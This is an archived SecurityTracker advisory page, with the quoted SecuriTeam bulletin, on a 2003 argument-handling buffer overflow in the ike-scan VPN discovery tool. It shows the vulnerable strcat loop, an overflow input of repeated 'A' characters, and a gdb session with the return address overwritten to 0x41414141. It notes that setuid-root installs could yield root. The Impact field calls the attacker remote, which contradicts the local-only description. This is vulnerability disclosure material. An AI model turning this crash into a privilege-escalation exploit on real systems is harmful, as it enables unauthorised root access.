SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Join our Affiliate Program
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Security)  >  ike-scan Vendors:  NTA Monitor Ltd.
'ike-scan' Buffer Overflow May Allow Local Users to Gain Elevated Privileges in Non-Default Configurations
SecurityTracker Alert ID:  1007052
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 24 2003
Impact:  Execution of arbitrary code via local system, Root access via local system
Version(s): 1.2
Description:  A buffer overflow vulnerability was reported in 'ike-scan'. A local user can execute arbitrary code. On some systems with a non-default configuration, this may yield root privileges to the local user.

SecuriTeam reported that a buffer overflow resides in the 'ike-scan.c' file in the processing of user-supplied arguments. A local user can trigger the overflow to potentially execute arbitrary code. A demonstration exploit transcript is provided:

/usr/local/bin/ike-scan
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentatio n fault

ike-scan is not installed with set user id (setuid) privileges, but previous reports have noted that some administrators may have configured the application with setuid root user privileges to accommodate lower privileged users, as ike-scan requires root privileges to be fully effective. In this case, a local user can gain root privileges on the system.

The report credits jsk.
Impact:  A remote user can execute arbitrary code with the privileges of ike-scan. This may be an issue on systems where administrators have configured ike-scan with setuid root privileges (which is not the default setting).
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.nta-monitor.com/ike-scan/ (Links to External Site)
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  SecuriTeam <support@securiteam.com>
Message History:   None.

 Source Message Contents
Date:  24 Jun 2003 16:15:53 +0200
From:  SecuriTeam <support@securiteam.com>
Subject:  [UNIX] ike-scan Buffer Overflow Vulnerabilities

 

The following security advisory is sent to the securiteam mailing list, and can be found at the Secur
iTeam web site: http://www.securiteam.com
- - promotion

Beyond Security in Canada

Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
We welcome ISPs, system integrators and IT systems resellers
to promote the most advanced vulnerability assessment solutions today.

Contact us at 416-482-0038 or at canadasales@beyondsecurity.com

- - - - - - - - -



  ike-scan Buffer Overflow Vulnerabilities
------------------------------------------------------------------------


SUMMARY

 <http://www.nta-monitor.com/ike-scan/> ike-scan, a VPN Discovery and 
Fingerprinting tool, has been found to contain a buffer overflow 
vulnerability.

DETAILS

Vulnerable code:
Vulnerable code can be found in ike-scan.c:295
........................

  for (arg=0; arg<argc; arg++) {
      strcat(arg_str, argv[arg]);
      if (arg < (argc-1)) {
         strcat(arg_str, " ");

.....................................

Example:
sh-2.05b# /usr/local/bin/ike-scan  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
sh-2.05b# gdb /usr/local/bin/ike-scan 
GNU gdb Red Hat Linux (5.2.1-4)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you 
are
welcome to change it and/or distribute copies of it under certain 
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for 
details.
This GDB was configured as "i386-redhat-linux"...
/tmp/ike-scan-1.0/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
xxxxxxxxxxx: File name too long.
(gdb) r 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /usr/local/bin/ike-scan 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x08048da2 in main (argc=1094795585, argv=0x41414141) at ike-scan.c:295
295           strcat(arg_str, argv[arg]);
(gdb) bt
#0  0x08048da2 in main (argc=1094795585, argv=0x41414141) at 
ike-scan.c:295
#1  0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) x/i $eip
0x8048da2 <main+126>:   pushl  (%eax,%ebx,4)
(gdb) x/i $eax
0x41414141:     Cannot access memory at address 0x41414141
(gdb) x/i 0x08048da2
0x8048da2 <main+126>:   pushl  (%eax,%ebx,4)
(gdb)

ponit:argv=0x41414141 ,problem in *argv(),


ADDITIONAL INFORMATION

The information has been provided by  <mailto:jsk@ph4nt0m.net> jsk.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@secu
riteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.co
m 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, con
sequential, loss of business
 profits or special damages.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC